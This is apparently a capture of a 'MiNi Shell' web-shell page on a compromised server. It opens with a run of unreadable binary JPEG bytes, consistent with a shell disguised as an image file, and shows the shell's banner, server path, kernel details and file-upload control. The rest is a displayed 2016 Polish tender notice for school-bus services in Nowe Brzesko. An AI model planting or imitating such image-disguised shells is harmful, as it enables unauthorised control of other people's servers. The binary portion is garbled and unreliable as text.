JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160726/156317-N-2016.html

<p class="kh_header"><b>Nowe Brzesko: Dowóz i odwóz dzieci do szkół z terenu Gminy i Miasta Nowe Brzesko w okresie od 01.09.2016 r. do 30.06.2017 r. z wykorzystaniem gimbusa stanowiącego własność gminy</b><br>
<b>Numer ogłoszenia: 156317 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy i Miasta Nowe Brzesko , ul. Krakowska 44, 32-120 Nowe Brzesko, woj. małopolskie, tel. 12 385-20-94, faks 12 385 03 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drwinia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz i odwóz dzieci do szkół z terenu Gminy i Miasta Nowe Brzesko w okresie od 01.09.2016 r. do 30.06.2017 r. z wykorzystaniem gimbusa stanowiącego własność gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
,,Dowóz i odwóz dzieci do szkół z terenu Gminy i Miasta Nowe Brzesko w okresie od 01.09.2016 r. do 30.06.2017 r. z wykorzystaniem gimbusa stanowiącego własność gminy,,
A. Przedmiotem umowy jest usługa dowozu i odwozu dzieci do szkół na terenie Gminy i Miasta Nowe Brzesko w okresie od 01.09.2016 r. do 30.06.2017 r. z wykorzystaniem gimbusa stanowiącego własność gminy.
Dowóz i odwóz dzieci do następujących placówek:
- Zespołu Przedszkolno - Szkolno - Gimnazjalnego w Nowym Brzesku - liczba dzieci dojeżdżających 165
- Zespołu Szkolno ~ Gimnazjalnego w Sierosławicach. - liczba dzieci dojeżdżających: 143
- Szkoły Podstawowej w Mniszowie - liczba dzieci dojeżdżających: 26
 Liczba dzieci dojeżdżających ogółem: 334
Usługa będzie realizowana na podstawie imiennych biletów miesięcznych.

B. Szczegółowy opis przedmiotu umowy:
1. Wykonanie usługi dowozu i odwozu dzieci szkolnych do Zespołu Przedszkolno - Szkolno - Gimnazjalnego w Nowym Brzesku.
Usługa dowożenia realizowana będzie autobusem stanowiącym własność gminy, tzw. ,,Gimbusem,,
- ilość kursów dziennie 8, w tym 3 dowozy i 5 odwozów
- ilość km dzienna 159km
- ilość dzieci 112 rano + 165 po południu
- dowóz w godzinach 7.00- 9.15
- odwóz w godzinach 13.35-16.30
 
2. Wykonanie   usługi  dowozu   i  odwozu   dzieci  szkolnych   do  Zespołu  Szkołno  - Gimnazjalnego w Sierosławicach.
Usługa dowożenia realizowana będzie autobusem przewoźnika. Liczba miejsc w autobusie nie mniejsza niż 55.
- ilość kursów dziennie 6, w tym 3 dowozy i 3 odwozy
- ilość km dzienna 160km
- ilość dzieci 143 rano + 143 po południu
- dowóz w godzinach 6.50 - 9.00
- odwóz w godzinach 13.20 - 16.00

3. Wykonanie  usługi dowozu i odwozu dzieci do Szkoły Podstawowej w Mniszowie i jako przedłużenie trasy dowóz dzieci z Rudna Dolnego do Zespołu Przedszkolno - Szkolno - Gimnazjalnego w Nowym Brzesku.
Usługa   dowożenia    realizowana    będzie    autobusem   przewoźnika.    Liczba   miejsc w autobusie nie mniejsza niż 42.
- ilość kursów dziennie 3 dowozy
- ilość km dzienna 21 km
- ilość dzieci 79 rano (w tym 26 dzieci do Szkoły Podstawowej w Mniszowie, 5 dzieci do Szkoły w Nowym Brzesku,48 dzieci z Rudna do Zespołu Przedszkolno -  Szkolno - Gimnazjalnego w Nowym Brzesku
- dowóz w godzinach 7.00 - 7.50
Odwóz w godz.  12.40 - 13.00 dzieci ze szkoły podstawowej w Mniszowie gimbusem stanowiącym własność gminy


Dodatkowe kursy:
Poniedziałek godz.   9:10 Nowe Brzesko - Mniszów Szkoła - Nowe Brzesko Szkoła     6 km
Piątek	godz.   9:10 Nowe Brzesko - Mniszów Szkoła - Nowe Brzesko Szkoła     6 km


Warunki dotyczące zamówienia :
1. Usługa będzie realizowana w okresie od 1 września 2016 r. do 30 czerwca 2017 r., w miesiącach szkolnych ( z wyjątkiem: okresu wakacyjnego, ferii zimowych, dni świątecznych, a także dni, w których szkoła jest nieczynna).
2. Przewozy dzieci odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tj. Dz. U z 2012, poz.1137 z późn. zm.) i innych przepisach związanych z przewozem osób, ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2013, poz. 1414 z póź. zm).
3. Opiekę nad dowożonymi dziećmi zapewnia Wykonawca, który powinien zapewnić opiekę 1 osoby dorosłej w każdym autobusie (łącznie 3 opiekunów) z zastrzeżeniem. że kierowca nie może pełnić funkcji opiekuna.
4.  Wykonawca musi zapewnić uczniom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny.
5.  Dowożenie dzieci musi odbywać się ubezpieczonymi autobusami posiadającymi aktualny przegląd techniczny. Wykonawca ubezpiecza autobusy i pasażerów od wszelkich szkód powstałych podczas przewozu oraz pozostających w związku z przewozem.
6. Dowóz dzieci odbywa się w dni nauki szkolnej. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym z Przedstawicielem Zamawiającego.
7. Zamawiający dopuszcza możliwość zmiany ilości dowożonych uczniów w trakcie okresu realizacji zamówienia w skutek nieprzewidzianych wcześniej okoliczności. W przypadku zwiększenia liczby dowożonych uczniów Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie.
8. Autobusy muszą posiadać wystarczającą liczbę miejsc na określonej trasie.
9. Szczegółowy rozkład godzin odwozu i dowozu jak i opis tras stanowi załącznik nr A do SIWZ. Zamawiający dopuszcza możliwość nieznacznych zmian, o których niezwłocznie powiadomi Wykonawcę.
10. Cena, jaką Wykonawca przedstawi w ofercie za dowóz i odwóz dzieci szkolnych będzie ceną ofertową netto i brutto (z podatkiem VAT) za całość przedmiotu zamówienia oraz będzie obejmować jeden miesiąc wykonywania przedmiotu zamówienia dla 1 ucznia w formie biletów miesięcznych,
11. Zamawiający będzie zobowiązany do comiesięcznej zapłaty za bilety dla uczniów na podstawie wystawionej przez Wykonawcę faktury, potwierdzonej przez pracownika MGZEAS ( Miejsko-Gminny Zespół  Ekonomiczno-Administracyjny Szkół)
12. Do wykonania zamówienia Wykonawca musi dysponować, co najmniej 3 własnymi autobusami (w tym 1 rezerwowy). W ramach niniejszego zamówienia Zamawiający wydzierżawia autobus - ,,gimbus,, stanowiący własność Gminy, który będzie wykorzystywany przez Wykonawcę do dowozu i odwozu dzieci szkolnych do Zespołu Przedszkolno - Szkolno - Gimnazjalnego w Nowym Brzesku. Wykonawcy ubiegający się o zamówienie mogą zapoznać się ze stanem technicznym gimbusa Zamawiającego po wcześniejszym umówieniu się. Gimbus zostanie oddany Wykonawcy na podstawie umowy dzierżawy.
13. Dane dotyczące autobusu Zamawiającego: ,,Gimbus ,, marki Autosan, typ H9-21.41S, rok produkcji 2001, liczba miejsc 42+1.
14. Dzierżawa gimbusa- Wykonawca (Dzierżawca) zobowiązuje się do:
- użytkowania przedmiotu dzierżawy zgodnie z ich przeznaczeniem,
- użytkowania przedmiotu dzierżawy zgodnie z wymogami prawidłowej eksploatacji,
- wykonywania na własny koszt wszystkich napraw i konserwacji bez możliwości ubiegania się o zwrot poniesionych nakładów od Wydzierżawiającego,
- zapewnienia odpowiedniego ogumienia w zależności od sezonu oraz dokonania jego wymiany,
- ponoszenia kosztu zakupu paliwa,
- ponoszenia kosztów przeglądów technicznych,
- zawarcia obowiązkowej umowy ubezpieczenia OC oraz umowy NW,
- nie   dokonywania   zmian   na   przedmiocie   dzierżawy   bez   pisemnej   zgody Wydzierżawiającego,
- nie   udostępniania  osobom  trzecim  przedmiotu   dzierżawy   do   użytkowania, ani podnajmowania przedmiotu dzierżawy bez pisemnej zgody Wydzierżawiającego.

15. Wykonawca (Dzierżawca) będzie płacił miesięcznie w miesiącach, w których realizowany jest dowóz czynsz dzierżawy gimbusa w wysokości 500 zł brutto miesięcznie. Umowa dzierżawy zostanie zawarta na okres od 01.09.2016 r. do30.06.2017r.,
16. Zamawiający wystawi, co miesiąc wybranemu Wykonawcy (Dzierżawcy) fakturę z tytułu dzierżawy gimbusa .

Wymagania stawiane Wykonawcy:
- Wykonawca jest  odpowiedzialny, za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia
- Wymagana jest należyta staranność przy realizacji zobowiązań umowy,
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy
- Określenie przez Wykonawcę telefonów  kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia

Szczegółowy opis i zakres przedmiotu zamówienia określony został w Załączniku A, który będzie stanowił integralną część umowy.
Ofertę należy opracować na podstawie specyfikacji istotnych warunków zamówienia (SIWZ), Załączniku A oraz ewentualnej wizji w terenie.


 Wartość poniżej  209 000 euro.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3 000.00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający  uzna warunek za spełniony gdy wykonawca złoży do oferty ważną licencję na wykonywanie krajowego transportu drogowego osób. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Zamawiający uzna warunek za spełniony gdy wykonawca udokumentuje w okresie ostatnich trzech lat przed upływem terminu składania ofert  a jeśli okres prowadzenia działalności jest krótszy w tym okresie realizację co najmniej jednej usługi ( wykonywanej w sposób ciągły w okresie 1 roku szkolnego) polegającej na przewozie uczniów o wartości co najmniej 100 000 zł brutto w danym roku szkolnym ( na wartość 100 000 zł brutto może składać się nie więcej niżn jedno zamówienie). Jeżeli usługi są w trakcie realizacji wartość podana wyżej i  wymagany czas realizacji tj. w  sposób ciągły w okresie 1 roku szkolnego dotyczy usług już zrealizowanych z danej umowy.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym.  Zamawiający uzna  warunek za spełniony poprzez wykazanie dysponowaniem minimum:
a)  1  autobusem  o łącznej dopuszczalnej liczbie miejsc siedzących minimum 55
 b) 1  autobusem  o łącznej dopuszczalnej liczbie miejsc siedzących minimum 42
 c) 1  autobusem ( rezerwowy)   o łącznej dopuszczalnej liczbie miejsc siedzących minimum 55

W wykazie należy zaznaczyć przy każdym pojeździe ilość miejsc siedzących.
         
Do wykazu należy dołączyć kopie poświadczoną za zgodność z oryginałem dowodów rejestracyjnych  wymienionych pojazdów ( z dołączonych kopii ddowodów rejestracyjnych musi wynikać, że pojazd ma  przeprowadzone  badania techniczne potwierdzające dopuszczenie go do ruchu).
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia.  Zamawiający uzna  warunek za spełniony poprzez wykazanie dysponowaniem minimum:
a)  4 kierowcami ( w tym jeden rezerwowy) posiadającymi uprawnienia przewidziane obowiązującym prawem tj: dokumenty stwierdzające uprawnienia do kierowania autobusem ( kategoria prawajazdy D)
b)  3  dorosłymi osobami, które będą sprawować opiekę nad dowożonymi dziećmi posiadającymi kwalifikacje pedagogiczne lub zaświadczenie ukończenia kursu dla kierowników wycieczek szkolnych  ( opiekunem nie może  być kierowca autobusu).
Na potwierdzenie warunku wykonawca zobowiązany jest złożyć wykaz osób  oraz oświadczenie, że osoby wymienione w wykazie posiadają wymagane uprawnienia.
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający uzna warunek za spełniony poprzez posiadanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  100.000 zł. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - autobus zastępczy w czasie krótszym niz 15 minut - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany umowy w przypadku:
a) zmiany kluczowego personelu niezbędnego do wykonywania zamówienia zarówno  po stronie Zamawiającego jak również po stronie Wykonawcy (np. kierowca autobusu). Zamawiający/Wykonawca wyrazi zgodę za zmianę personelu ,,drugiej strony,, tylko   w przypadku potwierdzenia wystąpienia okoliczności niezależnych od Wykonawcy czy Zamawiającego w szczególności powodem takim mogą być okoliczności powodujące, iż wskazana osoba nie będzie mogła wykonywać swojej pracy.
b) zmiany autobusu wskazanego w ofercie. Zmieniony autobus musi posiadać aktualne ubezpieczenie oraz aktualny przegląd techniczny.
c) zawieszenia przez Zamawiającego wykonywania usługi, w związku z wystąpieniem siły wyższej. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia
d) rezygnacji z części usługi przez Zamawiającego, wprowadzenie usługi zamiennej, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy,
e) zmniejszenia lub zwiększenia liczby dzieci korzystających z przewozu,
a) zmiany tras przewozów,
b) zmiany godzin dowozu i odwozu uczniów,
c) zmiany wartości umowy w sytuacji zmiany urzędowej stawki podatku VAT na oferowany przedmiot zamówienia. Zmiana taka może nastąpić od dnia wejścia w życie podpisanego aneksu do niniejszej umowy na podstawie pisemnego zgłoszenia Wykonawcy,
d) zmiany wartości umowy o której mowa w § 5 ust,. 3 umowy w sytuacji zwiększenia lub zmniejszenia liczby dzieci korzystających z usługi w skutek nieprzewidzianych wcześniej okoliczności
e) zmiany zakresu prac, które wykonawca powierzył podwykonawcom, a które określone są w złożonej ofercie
f) wprowadzenia do realizacji części zamówienia przez podwykonawcę  pomimo, że Wykonawca nie dopuścił takiej możliwości w treści oferty,  za zgodą Zamawiającego i z zachowaniem zasad dotyczących  podwykonawców
2. Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę/ Zamawiającego powinien wpłynąć do Zamawiającego/Wykonawcy w formie pisemnej w terminie minimum   7 dni przed planowanym wprowadzeniem zmian.
3. We wniosku o zmianę warunków umowy należy podać, czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany.
4. Zmiany do umowy muszą być wprowadzane aneksem w formie pisemnej po wcześniejszym zaakceptowaniu przez Zamawiającego/Wykonawcę.
